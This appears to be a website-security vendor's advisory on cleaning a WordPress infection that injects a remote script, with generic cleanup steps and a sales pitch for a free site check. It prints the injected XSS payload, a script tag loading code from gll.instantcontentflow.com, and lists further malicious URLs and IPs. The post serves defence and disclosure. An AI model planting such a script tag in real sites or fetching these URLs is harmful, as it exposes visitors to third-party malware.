XSS: How to Clean gll.instantcontentflow.com Malware

Recently, we noticed several aggressive attacks originating from two IPs 31.43.191.223 ( South Africa ), and 89.248.165.53 ( Netherlands ). To counter-attack these malicious requests, we are blocking the following IP ranges: 31.43.191.0/24, and 89.248.165.0/24.

Try our free site check.

Cleanup steps

  • Perform a full website backup, including web files and database.
  • Re-install the core WordPress files, including wp-config.php.
  • Check all the plugins, delete the malicious folders, and apply the available updates. Avoid using nulled scripts or plugins downloaded from third-party sources.
  • Review users with admin privileges and change all the passwords.

How to clear the malicious script

  • Review the theme settings and look for the “Custom code” section. Check all the entries, including custom css, custom javascript, etc.
  • Update all the site components.

Blocked for XSS: Cross Site Scripting in POST

<script src="https://gll.instantcontentflow.com"></script>

Malicious URLs
https://gll.instantcontentflow.com/
https://lyubov.empatiya.net/?news&s
https://distributemodel.com/emr2zm1sk?key=a4f93d2fc3497f24dc29b96c78a0b459

Bad IPs: 172.240.108.76.

Cloudflare nameservers:
1. instantcontentflow.com
jaime.ns.cloudflare.com
kelly.ns.cloudflare.com

2. empatiya.net
elsa.ns.cloudflare.com
vin.ns.cloudflare.com

Sucuri check:
Resource from a blacklisted domain gll.instantcontentflow.com

If you’ve recently noticed suspicious files installed, we can help with a free site check.

Our skilled malware analysts are available 24/7 to fix hacked WordPress websites and clean up malware – reach out to us if you need help.

Hacked website? Try our free site check.

A security analyst will perform a free thorough external site check within the next minutes.